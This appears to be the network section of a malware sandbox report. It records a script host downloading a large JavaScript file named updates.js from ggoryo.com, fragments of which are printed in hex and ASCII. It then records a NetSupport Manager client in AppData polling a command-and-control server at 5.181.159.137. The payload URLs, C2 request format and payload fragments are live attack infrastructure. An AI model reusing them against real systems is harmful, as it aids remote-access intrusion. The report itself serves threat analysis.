                                                                                                                                                  Oct 8, 2024 15:23:46.350295067 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350336075 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350367069 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350373030 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350400925 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350430012 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350903988 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350944042 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.350986004 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.350995064 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.351021051 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351047039 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351135969 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.351176977 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.351207018 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351214886 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.351238012 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351260900 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.351965904 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.352006912 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.352041006 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.352049112 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.352094889 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.352982998 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353033066 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353058100 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353065968 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353097916 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353125095 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353522062 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353560925 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353588104 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353595018 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.353626966 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.353634119 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.363997936 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.364043951 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.364159107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.364160061 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.364176989 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.364260912 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442229033 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442285061 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442336082 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442349911 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442385912 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442405939 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442461014 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442507982 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442526102 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442533016 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442564964 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442584991 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442919016 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442959070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.442991018 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.442997932 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443022966 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443042994 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:46.443341970 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443407059 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:46.443422079 CEST49707443192.168.2.1677.83.199.112
Oct 8, 2024 15:23:46.443428993 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.443470001 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.443556070 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.443597078 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.443630934 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.443636894 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.443660021 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.443684101 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.443975925 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.444016933 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.444052935 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.444058895 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.444112062 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.444363117 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.444420099 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.444461107 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.444467068 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.444506884 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.454643965 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.454691887 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.454746008 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.454754114 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.454802990 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.454837084 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.533015013 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533041954 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533175945 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.533193111 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533257961 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.533529043 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533555031 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533613920 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.533622026 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533683062 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.533850908 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533869028 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533916950 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.533924103 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533963919 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.533967018 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.533977985 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.534023046 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.534029007 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.534121990 CEST | 443 | 49707 | 77.83.199.112 | 192.168.2.16
Oct 8, 2024 15:23:46.534200907 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:46.537159920 CEST | 49707 | 443 | 192.168.2.16 | 77.83.199.112
Oct 8, 2024 15:23:47.950566053 CEST | 49708 | 443 | 192.168.2.16 | 5.181.159.137
Oct 8, 2024 15:23:47.950608969 CEST | 443 | 49708 | 5.181.159.137 | 192.168.2.16
Oct 8, 2024 15:23:47.950719118 CEST | 49708 | 443 | 192.168.2.16 | 5.181.159.137
Oct 8, 2024 15:23:48.018405914 CEST | 49708 | 443 | 192.168.2.16 | 5.181.159.137
Oct 8, 2024 15:23:48.018434048 CEST | 443 | 49708 | 5.181.159.137 | 192.168.2.16
Oct 8, 2024 15:23:48.018500090 CEST | 443 | 49708 | 5.181.159.137 | 192.168.2.16
Oct 8, 2024 15:23:48.774760962 CEST | 49709 | 80 | 192.168.2.16 | 104.26.1.231
Oct 8, 2024 15:23:48.779644012 CEST | 80 | 49709 | 104.26.1.231 | 192.168.2.16
Oct 8, 2024 15:23:48.779745102 CEST | 49709 | 80 | 192.168.2.16 | 104.26.1.231
Oct 8, 2024 15:23:49.021406889 CEST | 49709 | 80 | 192.168.2.16 | 104.26.1.231
Oct 8, 2024 15:23:49.026211023 CEST | 80 | 49709 | 104.26.1.231 | 192.168.2.16
Oct 8, 2024 15:23:49.474644899 CEST | 80 | 49709 | 104.26.1.231 | 192.168.2.16
Oct 8, 2024 15:23:49.474853039 CEST | 49709 | 80 | 192.168.2.16 | 104.26.1.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 15:23:28.223781109 CEST | 56083 | 53 | 192.168.2.16 | 1.1.1.1
Oct 8, 2024 15:23:28.371336937 CEST | 53 | 56083 | 1.1.1.1 | 192.168.2.16
Oct 8, 2024 15:23:48.422188044 CEST | 51659 | 53 | 192.168.2.16 | 1.1.1.1
Oct 8, 2024 15:23:48.431422949 CEST | 53 | 51659 | 1.1.1.1 | 192.168.2.16
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 15:23:28.223781109 CEST | 192.168.2.16 | 1.1.1.1 | 0x364 | Standard query (0) | ggoryo.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:48.422188044 CEST | 192.168.2.16 | 1.1.1.1 | 0x4d2d | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 15:23:28.371336937 CEST | 1.1.1.1 | 192.168.2.16 | 0x364 | No error (0) | ggoryo.com |  | 77.83.199.112 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:48.431422949 CEST | 1.1.1.1 | 192.168.2.16 | 0x4d2d | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:48.431422949 CEST | 1.1.1.1 | 192.168.2.16 | 0x4d2d | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:23:48.431422949 CEST | 1.1.1.1 | 192.168.2.16 | 0x4d2d | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
• ggoryo.com
• 5.181.159.137
• geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49708 | 5.181.159.137 | 443 | 4108 | C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:23:48.018405914 CEST | 218 | OUT | POST http://5.181.159.137/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 5.181.159.137
Connection: Keep-Alive
CMD=POLLINFO=1ACK=1
Data Raw:
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.16 | 49709 | 104.26.1.231 | 80 | 4108 | C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:23:49.021406889 CEST | 118 | OUT | GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Oct 8, 2024 15:23:49.474644899 CEST | 937 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:23:49 GMT
Content-Type: text/html; Charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8cf672989bec0f5d-EWR
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: *
Cache-Control: private
Set-Cookie: ASPSESSIONIDQQBRCBDQ=CJDCDIJCPEJICKJPBEEGFCDM; path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Accept-Encoding
cf-apo-via: origin,host
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5rd8f69diKJvu1OkswtZPunHThzPVIqwdkDJUUtTUcCSddZ5YX3siTFwLUGvQHQMsT4%2BHLm6boOp4PuhQoftK%2FxKNaWOZxzgJGXtjTWt7TR2rKQiL7QRj%2FI3l7vMLGKJ%2FK%2FRLPjS9bPphr07"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1040.7357,-74.17240


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49705 | 77.83.199.112 | 443 | 7024 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 13:23:28 UTC | 377 | OUT | POST /trade/fix.php?6867 HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ggoryo.com
Content-Length: 7
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 13:23:28 UTC | 7 | OUT | Data Raw: 31 31 41 58 41 51 3d
Data Ascii: 11AXAQ=
2024-10-08 13:23:29 UTC | 357 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:23:29 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Description: File Transfer
Content-Disposition: attachment; filename=updates.js
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 2306526
Connection: close
Content-Type: application/octet-stream
2024-10-08 13:23:29 UTC | 7835 | IN | Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6f 28 69 2c 20 66 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 6e 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 20 26 26 20 72 65 71 75 69 72 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 66 20 26 26 20 63 29 20 72 65 74 75 72 6e 20 63 28 69 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: (function() { function r(e, n, t) { function o(i, f) { if (!n[i]) { if (!e[i]) { var c = "function" == typeof require && require; if (!f && c) return c(i, !0);
2024-10-08 13:23:29 UTC | 16384 | IN | Data Raw: 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 21 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 6e 75 6c 6c 0a 7d 2c 20 22 65 73 36 22 29 3b 0a 65 2e 66 69 6e 64 49 6e 74 65 72 6e 61 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 29 20 7b 0a 20 20 20 20 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 20 26 26 20 28 61 20 3d 20 53 74 72 69 6e 67 28 61 29 29 3b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 66 20 3d 20 61 2e 6c 65 6e 67 74 68 2c 20 67 20 3d 20 30 3b 20 67 20 3c 20 66 3b 20 67 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 20 3d 20 61 5b 67 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 62 2e 63 61 6c 6c 28 63 2c 20 68 2c 20 67 2c 20 61 29
Data Ascii: return !1 } } } return null}, "es6");e.findInternal = function(a, b, c) { a instanceof String && (a = String(a)); for (var f = a.length, g = 0; g < f; g++) { var h = a[g]; if (b.call(c, h, g, a)
2024-10-08 13:23:29 UTC | 16384 | IN | Data Raw: 62 0a 7d 3b 0a 6b 2e 63 72 61 77 20 3d 20 7b 7d 3b 0a 76 61 72 20 61 61 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 3b 0a 61 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 57 69 6e 64 6f 77 42 6f 75 6e 64 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 3b 0a 61 61 2e 69 6d 70 6c 5f 20 3d 20 61 61 3b 0a 6b 2e 63 72 61 77 2e 41 70 70 42 61 63 6b 67 72 6f 75 6e 64 44 65 6c 65 67 61 74 65 20 3d 20 61 61 3b 0a 76 61 72 20 63 61 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 72 6c 5f 20 3d 20 61 3b 0a 20 20 20 20 74 68 69 73 2e 75 73 65 41 75 74 68 5f 20 3d 20 62 0a 7d 3b 0a 63 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 55 72 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 74
Data Ascii: b};k.craw = {};var aa = function() {};aa.prototype.getWindowBounds = function() {};aa.impl_ = aa;k.craw.AppBackgroundDelegate = aa;var ca = function(a, b) { this.url_ = a; this.useAuth_ = b};ca.prototype.getUrl = function() { return t
2024-10-08 13:23:29 UTC | 16384 | IN | Data Raw: 63 20 3c 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 20 63 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 66 29 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 67 20 3d 20 30 3b 20 67 20 3c 20 66 2e 6c 65 6e 67 74 68 3b 20 67 20 2b 3d 20 38 31 39 32 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 68 20 3d 20 45 61 28 66 2c 20 67 2c 20 67 20 2b 20 38 31 39 32 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 20 3d 20 50 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 6c 20 3d
Data Ascii: c < arguments.length; c++) { var f = arguments[c]; if (Array.isArray(f)) for (var g = 0; g < f.length; g += 8192) { var h = Ea(f, g, g + 8192); h = Pa.apply(null, h); for (var l =
2024-10-08 13:23:29 UTC | 16384 | IN | Data Raw: 20 20 69 66 20 28 63 20 26 26 20 63 5b 31 5d 29 0a 20 20 20 20 20 20 20 20 69 66 20 28 61 20 3d 20 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 61 29 2c 20 22 37 2e 30 22 20 3d 3d 20 63 5b 31 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 20 26 26 20 61 5b 31 5d 29 20 73 77 69 74 63 68 20 28 61 5b 31 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 34 2e 30 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20 3d 20 22 38 2e 30 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 35 2e 30 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20
Data Ascii: if (c && c[1]) if (a = /Trident\/(\d.\d)/.exec(a), "7.0" == c[1]) if (a && a[1]) switch (a[1]) { case "4.0": b = "8.0"; break; case "5.0": b
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 66 61 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 68 65 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 69 77 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 70 73 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 73 64 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73
                                                                                                                                                  Data Ascii: ALE.substring(0, 2).toLowerCase() || "fa" == k.LOCALE.substring(0, 2).toLowerCase() || "he" == k.LOCALE.substring(0, 2).toLowerCase() || "iw" == k.LOCALE.substring(0, 2).toLowerCase() || "ps" == k.LOCALE.substring(0, 2).toLowerCase() || "sd" == k.LOCALE.s
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 74 68 29 20 72 65 74 75 72 6e 20 21 31 3b 0a 20 20 20 20 61 20 3d 20 61 2e 6d 61 74 63 68 28 2f 5b 3f 26 5d 62 6f 64 79 3d 28 5b 5e 26 5d 2a 29 2f 29 5b 31 5d 3b 0a 20 20 20 20 69 66 20 28 21 61 29 20 72 65 74 75 72 6e 20 21 30 3b 0a 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 63 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 21 31 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 2f 5e 28 3f 3a 5b 61 2d 7a 30 2d 39 5c 2d 5f 2e 7e 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 2b 24 2f 69 2e 74 65 73 74 28 61 29 0a 7d 3b 0a 6b 2e 68 74 6d 6c 2e 53 61 66 65 55 72 6c 2e 66 72 6f 6d 53 73 68 55 72 6c 20 3d 20 66 75 6e 63 74 69 6f 6e
                                                                                                                                                  Data Ascii: th) return !1; a = a.match(/[?&]body=([^&]*)/)[1]; if (!a) return !0; try { decodeURIComponent(a) } catch (c) { return !1 } return /^(?:[a-z0-9\-_.~]|%[0-9a-f]{2})+$/i.test(a)};k.html.SafeUrl.fromSshUrl = function
                                                                                                                                                  2024-10-08 13:23:29 UTC16384INData Raw: 2b 20 62 20 2b 20 27 22 20 72 65 71 75 69 72 65 73 20 67 6f 6f 67 2e 73 74 72 69 6e 67 2e 43 6f 6e 73 74 20 76 61 6c 75 65 2c 20 22 27 20 2b 20 63 20 2b 20 27 22 20 67 69 76 65 6e 2e 27 20 3a 20 22 22 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 69 6e 20 6b 2e 68 74 6d 6c 2e 53 61 66 65 48 74 6d 6c 2e 55 52 4c 5f 41 54 54 52 49 42 55 54 45 53 5f 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 29 20 63 20 3d 20 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 2e 75 6e 77 72 61 70 28 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 73 65 20 69 66 20 28 63 20 69
                                                                                                                                                  Data Ascii: + b + '" requires goog.string.Const value, "' + c + '" given.' : ""); if (b.toLowerCase() in k.html.SafeHtml.URL_ATTRIBUTES_) if (c instanceof k.html.TrustedResourceUrl) c = k.html.TrustedResourceUrl.unwrap(c); else if (c i
